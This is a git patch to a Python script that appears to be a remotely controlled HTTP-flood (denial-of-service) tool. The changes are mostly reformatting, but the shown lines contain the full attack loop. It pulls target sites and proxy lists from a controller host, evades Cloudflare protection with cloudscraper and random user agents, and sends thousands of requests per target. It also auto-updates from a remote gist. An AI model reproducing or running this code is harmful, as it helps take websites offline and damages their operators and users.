From 09b7deabad0f08c2c3e6dad4225c7d79e7309771 Mon Sep 17 00:00:00 2001
From: hryhorii-opanasenko <36611723+SterbenXIII@users.noreply.github.com>
Date: Sat, 26 Feb 2022 23:33:35 +0200
Subject: [PATCH] Update
Updated requirements, corrected code style, and removed redundant imports.
---
attack.py | 146 ++++++++++++++++++++++++---------------------
requirements.txt | 2 +-
target/pylist.json | 1 +
3 files changed, 80 insertions(+), 69 deletions(-)
create mode 100644 target/pylist.json
diff --git a/attack.py b/attack.py
index 6f022f2..7456985 100644
--- a/attack.py
+++ b/attack.py
@@ -1,12 +1,9 @@
import cloudscraper
-import requests
import os
-from bs4 import BeautifulSoup
from urllib.parse import unquote
from gc import collect
from loguru import logger
from os import system
-from requests import get
from sys import stderr
from threading import Thread
from random import choice
@@ -15,7 +12,6 @@
from pyuseragents import random as random_useragent
from json import loads
-from urllib.request import urlopen
import json
import sys
@@ -24,82 +20,96 @@
MAX_REQUESTS = 5000
disable_warnings()
def clear(): return system('cls')
+
+
logger.remove()
-logger.add(stderr, format="{time:HH:mm:ss} | {level: <8} | {line} - {message}")
+logger.add(
+ stderr, format="{time:HH:mm:ss} | {level: <8} | {line} - {message}")
threads = int(sys.argv[1])
+
def checkReq():
- os.system("python3 -m pip install -r requirements.txt")
- os.system("python -m pip install -r requirements.txt")
- os.system("pip install -r requirements.txt")
- os.system("pip3 install -r requirements.txt")
+ os.system("python3 -m pip install -r requirements.txt")
+ os.system("python -m pip install -r requirements.txt")
+ os.system("pip install -r requirements.txt")
+ os.system("pip3 install -r requirements.txt")
+
def checkUpdate():
- print("Checking Updates...")
- updateScraper = cloudscraper.create_scraper(browser={'browser': 'firefox','platform': 'android','mobile': True},)
- url = "https://gist.githubusercontent.com/AlexTrushkovsky/041d6e2ee27472a69abcb1b2bf90ed4d/raw/nowarversion.json"
- try:
- content = updateScraper.get(url).content
- if content:
- data = json.loads(content)
- new_version = data["version"]
- print(new_version)
- if int(new_version) > int(VERSION):
- print("New version Available")
- os.system("python updater.py " + str(threads))
- os.system("python3 updater.py " + str(threads))
- exit()
- else:
- sleep(5)
- checkUpdate()
- except:
- sleep(5)
- checkUpdate()
+ print("Checking Updates...")
+ updateScraper = cloudscraper.create_scraper(
+ browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
+ url = "https://gist.githubusercontent.com/AlexTrushkovsky/041d6e2ee27472a69abcb1b2bf90ed4d/raw/nowarversion.json"
+ try:
+ content = updateScraper.get(url).content
+ if content:
+ data = json.loads(content)
+ new_version = data["version"]
+ print(new_version)
+ if int(new_version) > int(VERSION):
+ print("New version Available")
+ os.system("python updater.py " + str(threads))
+ os.system("python3 updater.py " + str(threads))
+ exit()
+ else:
+ sleep(5)
+ checkUpdate()
+ except:
+ sleep(5)
+ checkUpdate()
+
def mainth():
- scraper = cloudscraper.create_scraper(browser={'browser': 'firefox','platform': 'android','mobile': True},)
- scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
-
+ scraper = cloudscraper.create_scraper(
+ browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
+ scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive',
+ 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
- while True:
- scraper = cloudscraper.create_scraper(browser={'browser': 'firefox','platform': 'android','mobile': True},)
- scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
- logger.info("GET RESOURCES FOR ATTACK")
- content = scraper.get(choice(HOSTS)).content
- if content:
- data = loads(content)
- else:
- sleep(5)
- continue
- logger.info("STARTING ATTACK TO " + data['site']['page'])
- site = unquote(data['site']['page'])
- if site.startswith('http') == False:
- site = "https://" + site
- try:
- attack = scraper.get(site)
- if attack.status_code >= 302 and attack.status_code >= 200:
- for proxy in data['proxy']:
- scraper.proxies.update({'http': f'{proxy["ip"]}://{proxy["auth"]}', 'https': f'{proxy["ip"]}://{proxy["auth"]}'})
- response = scraper.get(site)
- if response.status_code >= 200 and response.status_code <= 302:
- for i in range(MAX_REQUESTS):
- response = scraper.get(site)
- logger.info("ATTACKED; RESPONSE CODE: " + str(response.status_code))
- else:
- for i in range(MAX_REQUESTS):
- response = scraper.get(site)
- logger.info("ATTACKED; RESPONSE CODE: " + str(response.status_code))
- except:
- logger.warning("issue happened")
- continue
+ while True:
+ scraper = cloudscraper.create_scraper(
+ browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
+ scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive',
+ 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
+ logger.info("GET RESOURCES FOR ATTACK")
+ content = scraper.get(choice(HOSTS)).content
+ if content:
+ data = loads(content)
+ else:
+ sleep(5)
+ continue
+ logger.info("STARTING ATTACK TO " + data['site']['page'])
+ site = unquote(data['site']['page'])
+ if site.startswith('http') == False:
+ site = "https://" + site
+ try:
+ attack = scraper.get(site)
+ if attack.status_code >= 302 and attack.status_code >= 200:
+ for proxy in data['proxy']:
+ scraper.proxies.update(
+ {'http': f'{proxy["ip"]}://{proxy["auth"]}', 'https': f'{proxy["ip"]}://{proxy["auth"]}'})
+ response = scraper.get(site)
+ if response.status_code >= 200 and response.status_code <= 302:
+ for i in range(MAX_REQUESTS):
+ response = scraper.get(site)
+ logger.info("ATTACKED; RESPONSE CODE: " +
+ str(response.status_code))
+ else:
+ for i in range(MAX_REQUESTS):
+ response = scraper.get(site)
+ logger.info("ATTACKED; RESPONSE CODE: " +
+ str(response.status_code))
+ except:
+ logger.warning("issue happened")
+ continue
def cleaner():
- while True:
- sleep(60)
- checkUpdate()
- clear()
- collect()
+ while True:
+ sleep(60)
+ checkUpdate()
+ clear()
+ collect()
+
if __name__ == '__main__':
clear()
diff --git a/requirements.txt b/requirements.txt
index db085c4..7b1d493 100755
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,7 +1,7 @@
beautifulsoup4==4.10.0
names==0.3.0
cloudscraper==1.2.58
-loguru==0.5.3
+loguru==0.6.0
requests
urllib3==1.26.7
uuid==1.30
diff --git a/target/pylist.json b/target/pylist.json
new file mode 100644
index 0000000..0b0ef8c
--- /dev/null
+++ b/target/pylist.json
@@ -0,0 +1 @@
+[{"package": "beautifulsoup4", "version": "4.10.0", "deps": [{"package": "soupsieve", "version": "2.3.1"}]}, {"package": "names", "version": "0.3.0", "deps": []}, {"package": "cloudscraper", "version": "1.2.58", "deps": [{"package": "pyparsing", "version": "3.0.7"}, {"package": "charset-normalizer", "version": "2.0.12"}, {"package": "urllib3", "version": "1.26.7"}, {"package": "requests-toolbelt", "version": "0.9.1"}, {"package": "certifi", "version": "2021.10.8"}, {"package": "requests", "version": "2.27.1"}, {"package": "idna", "version": "3.3"}]}, {"package": "loguru", "version": "0.6.0", "deps": []}, {"package": "requests", "version": "2.27.1", "deps": [{"package": "urllib3", "version": "1.26.7"}, {"package": "idna", "version": "3.3"}, {"package": "certifi", "version": "2021.10.8"}, {"package": "charset-normalizer", "version": "2.0.12"}]}, {"package": "urllib3", "version": "1.26.7", "deps": []}, {"package": "uuid", "version": "1.30", "deps": []}, {"package": "pysocks", "version": "1.7.1", "deps": []}, {"package": "pyuseragents", "version": "1.0.5", "deps": []}]
\ No newline at end of file